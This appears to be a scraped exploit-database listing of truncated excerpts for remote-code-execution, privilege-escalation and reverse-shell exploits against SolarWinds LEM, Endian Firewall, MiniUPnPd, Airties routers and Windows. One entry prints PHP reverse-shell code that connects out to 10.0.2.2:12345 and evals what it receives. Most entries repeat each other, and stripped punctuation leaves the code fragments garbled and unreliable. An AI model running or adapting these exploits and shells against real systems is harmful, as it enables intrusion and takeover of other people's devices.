SolarWinds Log and Event ManagerTrigeo SIM 6.1.0 - Remote Command Execution

SolarWinds Log and Event ManagerTrigeo SIM 6.1.0 - Remote Command Execution Requirements: Python 2.7 netcat Tested on: Ubuntu 14.04 LTS Vulnerable Appliance Version: 6.1.0 Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe Instructions: Th...

Solarwinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution Exploit

Exploit for windows platform in category remote exploits Requirements: Python 2.7 netcat Tested on: Ubuntu 14.04 LTS Vulnerable Appliance Version: 6.1.0 Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe Instructions: The exploitlem.py...

SolarWinds Log and Event Manager/Trigeo SIM 6.1.0 - Remote Command Execution

Requirements: Python 2.7 netcat Tested on: Ubuntu 14.04 LTS Vulnerable Appliance Version: 6.1.0 Download: http://downloads.solarwinds.com/solarwinds/Release/LEM/SolarWinds-LEM-v6.1.0-Evaluation-VMware.exe Instructions: The exploitlem.py script will need to be run sudo since it uses sockets which...

Reverse Shell with Windows Media Center remote execution vulnerability, CVE-2 0 1 5-2 5 0 9 use-vulnerability warning-the black bar safety net

In this article, we will briefly introduce the reverse shell and the Windows Media Center vulnerabilities CVE-2 0 1 5-2 5 0 9）vulnerabilities, and finally a detailed description of the vulnerability of the method. 0×0 1 reverse shell The so-called shell, everybody is not strange, is nothing more...

The reverse shell and the CVE-2 0 1 5-2 5 0 9 exploit-vulnerability warning-the black bar safety net

0×0 0 introduction to In this article, we will briefly introduce the reverse shell and the CVE-2 0 1 5-2 5 0 9 vulnerabilities, and finally a detailed description of the vulnerability of the method. 0×0 1 reverse shell The so-called shell, everybody is not strange, is nothing more than a command...

OS X x64 - tcp bind shellcode, NULL byte free 144 bytes

OS X x64 - tcp bind shellcode, NULL byte free 144 bytes. Shellcode exploit for osx platform ;OS X x64, TCP bind shellcode port 4444, NULL byte free, 144 bytes long ;ASM code ;compile: ;nasm -f macho64 bind-shellcode.asm ;ld -macosxversionmin 10.7.0 -o bindsc bind-shellcode.o BITS 64 global start...

Endian Firewall < 3.0.0 - OS Command Injection (Python PoC) Exploit

Exploit for cgi platform in category remote exploits !/usr/bin/env python Endian Firewall Proxy User Password Change /cgi-bin/chpasswd.cgi OS Command Injection Exploit POC Reverse TCP Shell Ben Lincoln, 2015-06-28 http://www.beneaththewaves.net/ Requires knowledge of a valid proxy username and...

Endian Firewall &lt; 3.0.0 - OS Command Injection

!/usr/bin/env python Endian Firewall Proxy User Password Change /cgi-bin/chpasswd.cgi OS Command Injection Exploit POC Reverse TCP Shell Ben Lincoln, 2015-06-28 http://www.beneaththewaves.net/ Requires knowledge of a valid proxy username and password on the target Endian Firewall import httplib...

icmpsh - Simple Reverse ICMP Shell

Sometimes, network administrators make the penetration tester's life harder. Some of them do use firewalls for what they are meant to, surprisingly! Allowing traffic only onto known machines, ports and services ingress filtering and setting strong egress access control lists is one of these cases...

Microsoft Windows 8.08.1 (x64) - TrackPopupMenu Local Privilege Escalation (MS14-058)

Microsoft Windows 8.08.1 x64 - TrackPopupMenu Local Privilege Escalation MS14-058 Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation MS14-058 CVE-2014-4113 Privilege Escalation http://www.offensive-security.com Thx to Moritz Jodeit for the beautiful writeup...

MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS) Exploit

Exploit for multiple platform in category remote exploits !/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies...

MiniUPnPd 1.0 Stack Overflow

!/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies RT-204v3 CVE : 2013-0230 Exploit gives a reverse shell to...

MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series

MiniUPnPd 1.0 MIPS - Remote Stack Overflow Remote Code Execution for AirTies RT Series !/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture:...

MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series

!/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies RT-204v3 CVE : 2013-0230 Exploit gives a reverse shell to...

PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

Airties-Air5650TT-Remote

Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: [email protected] Twitter: @batuhanburakcin...

Airties Air5650TT - Remote Stack Overflow Exploit

Exploit for multiple platform in category remote exploits !/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: email protected Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import...

Airties Air5650TT - Remote Stack Overflow

!/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: [email protected] Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import socket, struct import urllib, urllib2, httplib i...

Airties Air5650TT - Remote Stack Overflow

Airties Air5650TT - Remote Stack Overflow !/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Contact: [email protected] Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import socket...

Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development

Exploit Pack, is an open source GPLv3 security tool, this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Iimpact are ready to use as well but you will require an expensive license to get access to all the...